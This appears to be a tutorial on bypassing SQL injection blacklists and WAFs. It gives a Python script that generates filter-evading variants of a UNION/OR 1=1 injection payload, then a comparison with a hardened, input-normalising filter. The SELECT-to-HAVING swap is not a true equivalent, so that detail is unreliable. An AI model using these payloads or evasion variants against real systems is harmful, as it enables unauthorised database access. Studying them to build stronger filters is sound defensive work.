One method of halting SQL injection is filtering, through either server-side text manipulation or Web Application Firewalls (WAFs). These systems target specific phrases commonly associated with attacks, such as SELECT, AND, OR, and spaces. They can be easily evaded by replacing those values with less obvious equivalents (for example, the MySQL operators && and || in place of AND and OR, or an inline comment /**/ in place of a space), which highlights the problem with blacklists in general: they match the spelling of an attack rather than its meaning.
We will create a script that takes an attack string, looks for substrings that are likely to be filtered, and produces alternative attack strings with those substrings replaced.
The following is our script:
subs = []
# Substitutions: a URL-encoded space (%20), an alternative keyword, and the
# symbolic operators MySQL accepts in place of AND and OR.
values = {" ": "%20", "SELECT": "HAVING", "AND": "&&", "OR": "||"}
originalstring = "' UNION SELECT * FROM Users WHERE username = 'admin' OR 1=1 AND username = 'admin';#"
secondoriginalstring = originalstring
for key, value in values.items():
    # One variant per substitution, each applied to the untouched original...
    if key in originalstring:
        newstring = originalstring.replace(key, value)
        subs.append(newstring)
    # ...and a second series in which the substitutions accumulate.
    if key in secondoriginalstring:
        secondoriginalstring = secondoriginalstring.replace(key, value)
        subs.append(secondoriginalstring)
print(subs)
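To see why the substitution approach works against a naive blacklist, and why it stops working once the filter normalises its input, the following is an added example (not code from the original page). It assumes a constructed toy blacklist of the four tokens the text names, a constructed payload of the same shape as the one above, and MySQL semantics for the substitutions (/**/ as whitespace, case-insensitive keywords, && and || as aliases for AND and OR); a real WAF rule set is far larger than this.

```python
import re
import urllib.parse

# Constructed toy blacklist standing in for a naive WAF rule set: the keywords the
# text lists plus the space character, matched case-sensitively and without decoding.
# Assumption: illustrative only, a real rule set is much larger.
BLACKLIST = [r"\bSELECT\b", r"\bAND\b", r"\bOR\b", r" "]

# Constructed sample payload with the same shape as the one in the text.
PAYLOAD = "' UNION SELECT * FROM Users WHERE username = 'admin' OR 1=1 AND username = 'admin';#"

# Each substitution preserves meaning in MySQL: /**/ is whitespace, keywords are
# case-insensitive, and && / || are aliases for AND / OR (unless PIPES_AS_CONCAT is set).
SUBSTITUTIONS = {
    " ": "/**/",
    "SELECT": "SeLeCt",
    "AND": "&&",
    "OR": "||",
}


def naive_waf_blocks(payload):
    """The blacklist the text describes: literal, case-sensitive, no normalisation."""
    return any(re.search(pattern, payload) for pattern in BLACKLIST)


def hardened_waf_blocks(payload):
    """Same blacklist, but the input is canonicalised first: URL-decode until stable,
    turn inline comments into spaces, case-fold, and map the operator aliases back
    to their keywords. Evasions that only change spelling no longer help."""
    text = payload
    for _ in range(3):  # bounded loop: double-encoding is a common trick
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text)
    text = text.upper()
    text = text.replace("||", " OR ").replace("&&", " AND ")
    return any(re.search(pattern, text) for pattern in BLACKLIST)


def generate_variants(payload, subs=SUBSTITUTIONS):
    """Mirror the text's script: one variant per single substitution applied to the
    original, followed by a cumulative variant with every substitution applied."""
    single = [payload.replace(k, v) for k, v in subs.items() if k in payload]
    cumulative = payload
    for k, v in subs.items():
        cumulative = cumulative.replace(k, v)
    return single + [cumulative]


def evading_variants(payload, blocker=naive_waf_blocks, subs=SUBSTITUTIONS):
    """Return the variants that the given filter lets through."""
    return [v for v in generate_variants(payload, subs) if not blocker(v)]


if __name__ == "__main__":
    for variant in generate_variants(PAYLOAD):
        naive = "BLOCK" if naive_waf_blocks(variant) else "pass "
        hardened = "BLOCK" if hardened_waf_blocks(variant) else "pass "
        print(f"naive={naive} hardened={hardened}  {variant}")
```

Only the cumulative variant, with every blacklisted token rewritten, slips past the naive filter; each single substitution still leaves another blacklisted token in place. The hardened filter catches the cumulative variant too, because it compares the canonical form of the input rather than its surface spelling, which is the property a blacklist needs before it is worth anything.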